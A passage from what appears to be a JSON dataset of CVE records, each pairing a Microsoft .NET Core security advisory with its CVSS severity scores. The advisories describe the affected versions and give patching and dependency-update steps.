Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8585",
        "Issue_Url_old": "https://github.com/dotnet/corefx/issues/24703",
        "Issue_Url_new": "https://github.com/dotnet/runtime/issues/23876",
        "Repo_new": "dotnet/runtime",
        "Issue_Created_At": "2017-10-17T21:18:37Z",
        "description": "Announcement] APITAG Microsoft Security Advisory CVETAG : Malformed Culture can cause application crash. Microsoft Security Advisory CVETAG Malformed Culture can cause application to crash Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public version of .NET Core where a malformed string request could cause an application to crash and lead to a denial of service. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG Developers are advised to update their .NET Core SDK to version NUMBERTAG Mitigation Factors .NET Core NUMBERTAG is not affected by this issue. Advisory FAQ How do I know if I am affected? Any application running against .NET Core NUMBERTAG or lower versions, or NUMBERTAG or lower versions is affected. The latest version of the .NET core runtime you have installed in your computer can be listed by running APITAG . Running that command produces an output similar to the following: ERRORTAG As this command only displays the latest version of the runtime installed (or the version set in the FILETAG file), it may hide the fact that you have a vulnerable runtime. A complete list of runtimes can be discovered by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG PATHTAG | | APITAG | PATHTAG | | APITAG Linux platforms URLTAG | PATHTAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG and NUMBERTAG then any applications targeting NUMBERTAG or NUMBERTAG of .NET Core are vulnerable. Also, even if you have a directory for NUMBERTAG and NUMBERTAG present in your system, if you've deployed self contained applications URLTAG targeting the impacted versions, these applications are also vulnerable. How do I fix my affected application? Applications can be fixed by installing the latest .NET Core runtimes or SDKs. Typically, application servers only have runtime packages installed and developer machines have the SDKs installed. Installers for the runtimes can be downloaded from the FILETAG . .NET Core NUMBERTAG SDK installs both versions NUMBERTAG and NUMBERTAG of the .NET Core runtime. If you've built a self contained application URLTAG , you must install the new runtime and SDK, recompile your application and redeploy. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the APITAG URLTAG file for that application. Set the framework version to the desired version and the APITAG property to false . These settings should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Since the APITAG file is an optional file, you may need to create one for each application and add it alongside the executable.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1302",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/384",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/384",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2019-09-10T17:00:20Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of an elevation of privilege vulnerability exists when a ASP.NET Core web application, created using vulnerable project templates, fails to properly sanitize web requests. An attacker who successfully exploited this vulnerability could perform content injection attacks and run script in the security context of the logged on user. To exploit the vulnerability, an attacker could send a specially crafted email, containing a malicious link, to a user. Alternatively, an attacker could use a chat client to social engineer a user into clicking the malicious link. However, in all cases to exploit this vulnerability a user must click a maliciously crafted link from an attacker. The update addresses the vulnerability by correcting how the .NET Core web application handles content encoding and updates the application templates to depend on the corrected code libraries. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not ASP.NET SPA services your application is not vulnerable. APITAG APITAG Affected software Any .NET Core based application running on ASP.NET Core NUMBERTAG or ASP.NET Core NUMBERTAG or any preview of ASP.NET Core NUMBERTAG APITAG APITAG Affected software Any ASP.NET Core based application that uses APITAG with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG ASP.NET Core NUMBERTAG will be updated with its RTM release. APITAG APITAG How do I know if I am affected? .NET Core has two types of dependencies: direct and transitive. Direct dependencies are dependencies where you specifically add a package to your project, transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, the APITAG package depends on the APITAG package. When you add a dependency on APITAG in your project, you're taking a transitive dependency on APITAG . Any application that has a direct or transitive dependency on the affected package affected software can be exposed to the vulnerability if it does not meet any of the mitigation factors mitigation factors . APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. You must now update your existing SPA services projects to use the newer version of the vulnerable packages. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Ian Routledge ( APITAG URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8416",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/95",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/95",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2019-01-08T18:00:27Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Tampering Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Tampering Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a tampering vulnerability exists when .NET Core improperly handles specially crafted files. An attacker who successfully exploited this vulnerability could write arbitrary files and directories to certain locations on a vulnerable system. However, an attacker would have limited control over the destination of the files and directories. To exploit the vulnerability, an attacker must send a specially crafted file to a vulnerable system The update addresses the vulnerability by correcting how .NET Core handles these files. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not extract ZIP compressed files it is unaffected. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG URLTAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. APITAG APITAG How do I fix the issue? If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . Finally, you must restart your applications once an updated runtime or SDK is installed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Danny Grander URLTAG of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23267",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/221",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/221",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2022-05-10T18:28:50Z",
        "description": "Microsoft Security Advisory CVE NUMBERTAG NET Denial of Service Vulnerability. Microsoft Security Advisory CVE NUMBERTAG NET Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET NUMBERTAG NET NUMBERTAG and .NET core NUMBERTAG where a malicious client can cause a Denial of Service via excess memory allocations through APITAG Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or earlier. Any .NET NUMBERTAG application running .NET NUMBERTAG or earlier. Any .NET Core NUMBERTAG applicaiton running on .NET Core NUMBERTAG or earlier. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG or .NET NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or Visual Studio NUMBERTAG or Visual Studio NUMBERTAG or Visual Studio NUMBERTAG from FILETAG .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links [CVE NUMBERTAG URLTAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-24112",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/176",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/176",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2021-02-09T18:17:29Z",
        "description": "Microsoft Security Advisory CVETAG | .NET NUMBERTAG and .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET NUMBERTAG and .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote code execution vulnerability exists when parsing certain types of graphics files. This vulnerability only exists on systems running on APITAG or Linux. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8292",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/88",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/88",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2018-10-09T22:51:18Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security feature bypass vulnerability that exists when .NET Core when HTTP authentication information is inadvertently exposed in an outbound request that encounters an HTTP redirect. An attacker who successfully exploited this vulnerability could use the information to further compromise the web application. The update addresses the vulnerability by correcting how .NET Core applications handles HTTP redirects. System administrators running .NET Core NUMBERTAG or .NET Core NUMBERTAG applications must update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG then restart their applications. If installed applications target .NET Core NUMBERTAG the applications must be migrated to NUMBERTAG or newer and redeployed. Developers must update their .NET Core SDK to versions NUMBERTAG and migrate any FILETAG or FILETAG applications to NUMBERTAG then redeploy. Discussion Discussion for this issue can be found at APITAG TBD APITAG APITAG Mitigation factors None APITAG APITAG Affected software Any .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime. Additionally package authors should check their dependencies to ensure they aren't depending on a vulnerable version of the following package: APITAG APITAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Any .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime. To check the currently installed runtimes and SDKs with version NUMBERTAG or later of .NET Core, open a command prompt and run the APITAG command. You should see an output similar to the following: ERRORTAG If you don't see a runtime entry for NUMBERTAG or NUMBERTAG any .NET Core NUMBERTAG applications run on that computer are vulnerable. If you don't have a NUMBERTAG ersion of the runtime or SDK installed, you can produce the complete list of runtimes by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG | | APITAG | APITAG | | Supported Linux platforms | APITAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG then any application targeting versions NUMBERTAG or NUMBERTAG are vulnerable. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. APITAG How do I fix the vulnerability? System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and install the latest NUMBERTAG runtime, ensuring that any NUMBERTAG applications are migrated to NUMBERTAG as soon as possible. Developers are advised to update their .NET Core SDK to versions NUMBERTAG and migrate any .NET Core URLTAG or FILETAG applications to NUMBERTAG and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at APITAG and APITAG , respectively. The Announcements repo for each product ( APITAG and APITAG ) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26701",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/178",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/178",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2021-03-09T18:01:29Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote code execution vulnerability exists in .NET NUMBERTAG and .NET Core due to how text encoding is performed. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software The vulnerable package is FILETAG . Upgrading your package and redeploying your app should be sufficient to address this vulnerability. Vulnerable package versions: Any .NET NUMBERTAG NET Core, or .NET Framework based application that uses the APITAG package with a vulnerable version listed below. Package Name| Vulnerable Versions| Secure Versions : | : : | : FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or 